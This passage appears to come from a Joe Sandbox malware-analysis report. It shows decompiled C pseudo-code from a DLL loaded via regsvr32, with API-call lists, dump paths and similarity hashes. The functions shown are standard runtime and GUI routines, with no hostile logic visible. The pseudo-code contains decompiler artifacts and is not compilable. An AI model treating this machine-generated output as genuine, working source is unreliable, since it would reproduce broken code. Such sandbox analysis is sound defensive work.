                                                                        						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
                                                                        							_t115 = 0;
                                                                        						}
                                                                        					}
                                                                        					_v100 = 0x28;
                                                                        					if(_t115 != 0) {
                                                                        						GetWindowRect(_t115,  &_v60);
                                                                        						E10007B50(E10007AE5(_t115, 2),  &_v100);
                                                                        						CopyRect( &_v28,  &_v80);
                                                                        					} else {
                                                                        						_t90 = E10006C53();
                                                                        						if(_t90 != 0) {
                                                                        							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
                                                                        						}
                                                                        						E10007B50(E10007AE5(_t90, 1),  &_v100);
                                                                        						CopyRect( &_v60,  &_v80);
                                                                        						CopyRect( &_v28,  &_v80);
                                                                        					}
                                                                        				}
                                                                        				_t117 = _v44.right - _v44.left;
                                                                        				asm("cdq");
                                                                        				_t104 = _v44.bottom - _v44.top;
                                                                        				asm("cdq");
                                                                        				_t114 = _v60.bottom;
                                                                        				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
                                                                        				asm("cdq");
                                                                        				asm("cdq");
                                                                        				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
                                                                        				if(_t110 >= _v28.left) {
                                                                        					_t78 = _v28.right;
                                                                        					if(_t117 + _t110 > _t78) {
                                                                        						_t110 = _t78 - _v44.right + _v44.left;
                                                                        					}
                                                                        				} else {
                                                                        					_t110 = _v28.left;
                                                                        				}
                                                                        				if(_t123 >= _v28.top) {
                                                                        					if(_t104 + _t123 > _v28.bottom) {
                                                                        						_t123 = _v44.top - _v44.bottom + _v28.bottom;
                                                                        					}
                                                                        				} else {
                                                                        					_t123 = _v28.top;
                                                                        				}
                                                                        				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                        • String ID:
                                                                        • API String ID: 808654186-0
                                                                        • Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                        • Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
                                                                        • Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                        • Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t32;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t41;
                                                                        				signed int _t54;
                                                                        				unsigned int _t59;
                                                                        				void* _t75;
                                                                        				intOrPtr* _t76;
                                                                        				signed int _t81;
                                                                        				char* _t83;
                                                                        				void* _t86;
                                                                        				intOrPtr _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t89;
                                                                        
                                                                        				_push(0x118);
                                                                        				_push(0x10042558);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t32 =  *0x1004c470; // 0x303bb91f
                                                                        				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
                                                                        				_t33 =  *0x1004f708; // 0x0
                                                                        				if(_t33 == 0) {
                                                                        					if( *((intOrPtr*)(_t88 + 8)) == 1) {
                                                                        						_t83 = "Buffer overrun detected!";
                                                                        						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
                                                                        						_t86 = 0xb9;
                                                                        					} else {
                                                                        						_t83 = "Unknown security failure detected!";
                                                                        						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
                                                                        						_t86 = 0xd4;
                                                                        					}
                                                                        					 *((char*)(_t88 - 0x20)) = 0;
                                                                        					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
                                                                        						E10017B90(_t88 - 0x124, "<program name unknown>");
                                                                        					}
                                                                        					_t71 = _t88 - 0x124;
                                                                        					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
                                                                        						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
                                                                        						_t89 = _t89 + 0x10;
                                                                        					}
                                                                        					_t41 = E10011820(_t71);
                                                                        					_pop(_t75);
                                                                        					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
                                                                        					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
                                                                        					_t87 = _t89;
                                                                        					E10017B90(_t87, _t83);
                                                                        					E10017BA0(_t87, "\n\n");
                                                                        					E10017BA0(_t87, "Program: ");
                                                                        					E10017BA0(_t87, _t71);
                                                                        					E10017BA0(_t87, "\n\n");
                                                                        					E10017BA0(_t87,  *(_t88 - 0x128));
                                                                        					_push(0x12010);
                                                                        					_push("Microsoft Visual C++ Runtime Library");
                                                                        					_push(_t87);
                                                                        					E10019D1D();
                                                                        					_t89 = _t89 + 0x3c;
                                                                        				} else {
                                                                        					 *(_t88 - 4) = 0;
                                                                        					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
                                                                        					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
                                                                        				}
                                                                        				E10011F56(3);
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				_t81 =  *(_t89 + 4);
                                                                        				_t76 =  *((intOrPtr*)(_t89 + 8));
                                                                        				if((_t81 & 0x00000003) != 0) {
                                                                        					if((_t81 & 0x00000001) == 0) {
                                                                        						L27:
                                                                        						_t54 =  *_t81;
                                                                        						_t81 = _t81 + 2;
                                                                        						if(_t54 !=  *_t76) {
                                                                        							goto L22;
                                                                        						} else {
                                                                        							_t54 = _t54;
                                                                        							if(_t54 == 0) {
                                                                        								goto L21;
                                                                        							} else {
                                                                        								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
                                                                        									goto L22;
                                                                        								} else {
                                                                        									if(_t54 == 0) {
                                                                        										goto L21;
                                                                        									} else {
                                                                        										_t76 = _t76 + 2;
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t54 =  *_t81;
                                                                        						_t81 = _t81 + 1;
                                                                        						if(_t54 !=  *_t76) {
                                                                        							goto L22;
                                                                        						} else {
                                                                        							_t76 = _t76 + 1;
                                                                        							if(_t54 == 0) {
                                                                        								goto L21;
                                                                        							} else {
                                                                        								if((_t81 & 0x00000002) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									goto L27;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					while(1) {
                                                                        						L12:
                                                                        						_t54 =  *_t81;
                                                                        						if(_t54 !=  *_t76) {
                                                                        							break;
                                                                        						}
                                                                        						_t54 = _t54;
                                                                        						if(_t54 == 0) {
                                                                        							L21:
                                                                        							return 0;
                                                                        						} else {
                                                                        							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
                                                                        								break;
                                                                        							} else {
                                                                        								_t59 = _t54;
                                                                        								if(_t59 == 0) {
                                                                        									goto L21;
                                                                        								} else {
                                                                        									_t54 = _t59 >> 0x10;
                                                                        									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t54 = _t54;
                                                                        										if(_t54 == 0) {
                                                                        											goto L21;
                                                                        										} else {
                                                                        											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
                                                                        												break;
                                                                        											} else {
                                                                        												_t76 = _t76 + 4;
                                                                        												_t81 = _t81 + 4;
                                                                        												if(_t54 != 0) {
                                                                        													continue;
                                                                        												} else {
                                                                        													goto L21;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L32;
                                                                        					}
                                                                        					L22:
                                                                        					asm("sbb eax, eax");
                                                                        					return (_t54 << 1) + 1;
                                                                        				}
                                                                        				L32:
                                                                        			}


                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
                                                                        • _strlen.LIBCMT ref: 10016C51
                                                                        • _strlen.LIBCMT ref: 10016C62
                                                                        • _strncpy.LIBCMT ref: 10016C7C
                                                                        • _strlen.LIBCMT ref: 10016C85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$FileModuleName_strncpy
                                                                        • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                        • API String ID: 2455649890-1673886896
                                                                        • Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                        • Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
                                                                        • Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                        • Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                        				signed int _t119;
                                                                        				intOrPtr _t120;
                                                                        				int _t122;
                                                                        				char* _t125;
                                                                        				int _t132;
                                                                        				signed int _t134;
                                                                        				int _t137;
                                                                        				int _t138;
                                                                        				short* _t160;
                                                                        				short* _t163;
                                                                        				int _t164;
                                                                        				signed int _t165;
                                                                        				long _t169;
                                                                        				signed int _t172;
                                                                        				int _t181;
                                                                        				char* _t183;
                                                                        				int _t184;
                                                                        				signed int _t186;
                                                                        				int _t187;
                                                                        				int _t190;
                                                                        				void* _t192;
                                                                        				short* _t193;
                                                                        				char* _t195;
                                                                        				char* _t196;
                                                                        				signed int _t199;
                                                                        
                                                                        				_t185 = __esi;
                                                                        				_push(0x38);
                                                                        				_push(0x10042708);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t199 =  *0x1004f73c; // 0x1
                                                                        				if(_t199 == 0) {
                                                                        					_t185 = 1;
                                                                        					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
                                                                        						_t169 = GetLastError();
                                                                        						__eflags = _t169 - 0x78;
                                                                        						if(_t169 == 0x78) {
                                                                        							 *0x1004f73c = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x1004f73c = 1;
                                                                        					}
                                                                        				}
                                                                        				if( *(_t192 + 0x14) <= 0) {
                                                                        					L11:
                                                                        					_t119 =  *0x1004f73c; // 0x1
                                                                        					if(_t119 == 2 || _t119 == 0) {
                                                                        						 *(_t192 - 0x28) = 0;
                                                                        						_t183 = 0;
                                                                        						 *(_t192 - 0x3c) = 0;
                                                                        						__eflags =  *(_t192 + 8);
                                                                        						if( *(_t192 + 8) == 0) {
                                                                        							_t138 =  *0x1004f724; // 0x0
                                                                        							 *(_t192 + 8) = _t138;
                                                                        						}
                                                                        						__eflags =  *(_t192 + 0x20);
                                                                        						if( *(_t192 + 0x20) == 0) {
                                                                        							_t137 =  *0x1004f734; // 0x0
                                                                        							 *(_t192 + 0x20) = _t137;
                                                                        						}
                                                                        						_t120 = E1001A444(0,  *(_t192 + 8));
                                                                        						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
                                                                        						__eflags = _t120 - 0xffffffff;
                                                                        						if(_t120 != 0xffffffff) {
                                                                        							__eflags = _t120 -  *(_t192 + 0x20);
                                                                        							if(__eflags == 0) {
                                                                        								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                        								L61:
                                                                        								__eflags =  *(_t192 - 0x28);
                                                                        								if(__eflags != 0) {
                                                                        									_push( *(_t192 - 0x28));
                                                                        									E100107C8(0, _t183, _t186, __eflags);
                                                                        								}
                                                                        								_t122 = _t186;
                                                                        								goto L64;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_t175 = _t192 + 0x14;
                                                                        							_push(_t192 + 0x14);
                                                                        							_push( *(_t192 + 0x10));
                                                                        							_push(_t120);
                                                                        							_push( *(_t192 + 0x20));
                                                                        							_t125 = E1001A487(0, _t183, _t185, __eflags);
                                                                        							_t195 =  &(_t193[0xc]);
                                                                        							 *(_t192 - 0x28) = _t125;
                                                                        							__eflags = _t125;
                                                                        							if(_t125 == 0) {
                                                                        								goto L46;
                                                                        							}
                                                                        							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
                                                                        							 *(_t192 - 0x24) = _t187;
                                                                        							__eflags = _t187;
                                                                        							if(_t187 == 0) {
                                                                        								_t186 =  *(_t192 - 0x48);
                                                                        								L58:
                                                                        								__eflags =  *(_t192 - 0x3c);
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t183);
                                                                        									E100107C8(0, _t183, _t186, __eflags);
                                                                        								}
                                                                        								goto L61;
                                                                        							}
                                                                        							 *(_t192 - 4) = 0;
                                                                        							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
                                                                        							 *(_t192 - 0x18) = _t195;
                                                                        							_t183 = _t195;
                                                                        							 *(_t192 - 0x44) = _t183;
                                                                        							E10011C50(_t183, 0, _t187);
                                                                        							_t196 =  &(_t195[0xc]);
                                                                        							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                        							__eflags = _t183;
                                                                        							if(_t183 != 0) {
                                                                        								L54:
                                                                        								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
                                                                        								 *(_t192 - 0x24) = _t132;
                                                                        								__eflags = _t132;
                                                                        								if(__eflags != 0) {
                                                                        									_push( *(_t192 + 0x1c));
                                                                        									_push( *(_t192 + 0x18));
                                                                        									_push(_t192 - 0x24);
                                                                        									_push(_t183);
                                                                        									_push( *(_t192 + 0x20));
                                                                        									_push( *((intOrPtr*)(_t192 - 0x40)));
                                                                        									_t134 = E1001A487(0, _t183, _t187, __eflags);
                                                                        									asm("sbb esi, esi");
                                                                        									_t186 =  ~( ~_t134);
                                                                        									goto L58;
                                                                        								}
                                                                        								goto L55;
                                                                        							} else {
                                                                        								_t183 = E100107B6( *(_t192 - 0x24));
                                                                        								__eflags = _t183;
                                                                        								if(_t183 == 0) {
                                                                        									L55:
                                                                        									_t186 = 0;
                                                                        									goto L58;
                                                                        								}
                                                                        								E10011C50(_t183, 0,  *(_t192 - 0x24));
                                                                        								_t196 =  &(_t196[0xc]);
                                                                        								 *(_t192 - 0x3c) = 1;
                                                                        								goto L54;
                                                                        							}
                                                                        						} else {
                                                                        							goto L46;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t119 != 1) {
                                                                        							L46:
                                                                        							_t122 = 0;
                                                                        							L64:
                                                                        							return E1001254F(_t122);
                                                                        						}
                                                                        						_t184 = 0;
                                                                        						 *(_t192 - 0x2c) = 0;
                                                                        						 *(_t192 - 0x38) = 0;
                                                                        						 *(_t192 - 0x34) = 0;
                                                                        						if( *(_t192 + 0x20) == 0) {
                                                                        							_t164 =  *0x1004f734; // 0x0
                                                                        							 *(_t192 + 0x20) = _t164;
                                                                        						}
                                                                        						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
                                                                        						 *(_t192 - 0x30) = _t190;
                                                                        						if(_t190 == 0) {
                                                                        							goto L46;
                                                                        						} else {
                                                                        							 *(_t192 - 4) = 1;
                                                                        							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
                                                                        							 *(_t192 - 0x18) = _t193;
                                                                        							 *(_t192 - 0x1c) = _t193;
                                                                        							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                        							if( *(_t192 - 0x1c) != 0) {
                                                                        								L21:
                                                                        								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
                                                                        									L36:
                                                                        									_t219 =  *(_t192 - 0x34);
                                                                        									if( *(_t192 - 0x34) != 0) {
                                                                        										_push( *(_t192 - 0x20));
                                                                        										E100107C8(0, _t184, _t190, _t219);
                                                                        									}
                                                                        									_t220 =  *(_t192 - 0x38);
                                                                        									if( *(_t192 - 0x38) != 0) {
                                                                        										_push( *(_t192 - 0x1c));
                                                                        										E100107C8(0, _t184, _t190, _t220);
                                                                        									}
                                                                        									_t122 = _t184;
                                                                        									goto L64;
                                                                        								}
                                                                        								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
                                                                        								 *(_t192 - 0x2c) = _t184;
                                                                        								if(_t184 == 0) {
                                                                        									goto L36;
                                                                        								}
                                                                        								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
                                                                        									 *(_t192 - 4) = 2;
                                                                        									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
                                                                        									 *(_t192 - 0x18) = _t193;
                                                                        									 *(_t192 - 0x20) = _t193;
                                                                        									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                        									__eflags =  *(_t192 - 0x20);
                                                                        									if( *(_t192 - 0x20) != 0) {
                                                                        										L31:
                                                                        										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
                                                                        										if(__eflags != 0) {
                                                                        											_push(0);
                                                                        											_push(0);
                                                                        											__eflags =  *(_t192 + 0x1c);
                                                                        											if(__eflags != 0) {
                                                                        												_push( *(_t192 + 0x1c));
                                                                        												_push( *(_t192 + 0x18));
                                                                        											} else {
                                                                        												_push(0);
                                                                        												_push(0);
                                                                        											}
                                                                        											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
                                                                        										}
                                                                        										goto L36;
                                                                        									} else {
                                                                        										_t160 = E100107B6(_t184 + _t184);
                                                                        										 *(_t192 - 0x20) = _t160;
                                                                        										__eflags = _t160;
                                                                        										if(__eflags == 0) {
                                                                        											goto L36;
                                                                        										}
                                                                        										 *(_t192 - 0x34) = 1;
                                                                        										goto L31;
                                                                        									}
                                                                        								}
                                                                        								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
                                                                        									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                        								}
                                                                        								goto L36;
                                                                        							} else {
                                                                        								_t163 = E100107B6(_t190 + _t190);
                                                                        								_pop(_t172);
                                                                        								 *(_t192 - 0x1c) = _t163;
                                                                        								if(_t163 == 0) {
                                                                        									goto L46;
                                                                        								}
                                                                        								 *(_t192 - 0x38) = 1;
                                                                        								goto L21;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t181 =  *(_t192 + 0x14);
                                                                        				_t165 =  *(_t192 + 0x10);
                                                                        				while(1) {
                                                                        					_t172 = _t181 - 1;
                                                                        					if( *_t165 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t165 = _t165 + 1;
                                                                        					if(_t172 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					_t172 = _t172 | 0xffffffff;
                                                                        					break;
                                                                        				}
                                                                        				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
                                                                        				goto L11;
                                                                        			}





























                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
                                                                        • GetLastError.KERNEL32 ref: 100180BA
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: String$ByteCharMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1775797328-0
                                                                        • Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                        • Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
                                                                        • Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                        • Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E1002583A(void* _a4, intOrPtr _a8) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				int _v16;
                                                                        				char* _v20;
                                                                        				int _v24;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t35;
                                                                        				void* _t37;
                                                                        				void* _t42;
                                                                        				int* _t43;
                                                                        
                                                                        				_t43 = 0;
                                                                        				_v12 = 0;
                                                                        				_v20 = E100017D0(_a8, 0x104);
                                                                        				_v16 = 0x104;
                                                                        				_t42 = RegOpenKeyA;
                                                                        				_v24 = 0;
                                                                        				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
                                                                        					_push(_t37);
                                                                        					_v8 = 0;
                                                                        					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                                                                        						_a4 = 0;
                                                                        						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                                                                        							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
                                                                        							asm("sbb esi, esi");
                                                                        							_t43 =  ~_t35 + 1;
                                                                        							RegCloseKey(_a4);
                                                                        						}
                                                                        						RegCloseKey(_v8);
                                                                        					}
                                                                        					RegCloseKey(_v12);
                                                                        					_pop(_t37);
                                                                        				}
                                                                        				E10006CE2(_t37, _a8, _t42, 0xffffffff);
                                                                        				return _t43;
                                                                        			}















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                        • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                        • RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpen$QueryValue
                                                                        • String ID: CLSID$InProcServer32
                                                                        • API String ID: 3523390698-323508013
                                                                        • Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                        • Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
                                                                        • Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                        • Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10036531() {
                                                                        				struct HWND__* _v4;
                                                                        				void* _v68;
                                                                        				void* _v76;
                                                                        				int _t4;
                                                                        				int _t10;
                                                                        				struct HDC__* _t15;
                                                                        				void* _t18;
                                                                        
                                                                        				_t4 =  *0x1004b8cc; // 0xffffffff
                                                                        				if(_t4 == 0xffffffff) {
                                                                        					_t15 = GetDC(0);
                                                                        					_v4 = 0;
                                                                        					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                                                        					if(_t18 != 0) {
                                                                        						_v68 = SelectObject(_t15, _t18);
                                                                        					}
                                                                        					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
                                                                        					if(_t18 != 0) {
                                                                        						SelectObject(_t15, _v76);
                                                                        						DeleteObject(_t18);
                                                                        					}
                                                                        					ReleaseDC(0, _t15);
                                                                        					_t10 =  *0x1004b8cc; // 0xffffffff
                                                                        					return _t10;
                                                                        				}
                                                                        				return _t4;
                                                                        			}











                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 10036543
                                                                        • GetSystemMetrics.USER32 ref: 10036567
                                                                        • CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 10036582
                                                                        • GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
                                                                        • SelectObject.GDI32(00000000,?), ref: 100365A1
                                                                        • DeleteObject.GDI32(00000000), ref: 100365A4
                                                                        • ReleaseDC.USER32 ref: 100365AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
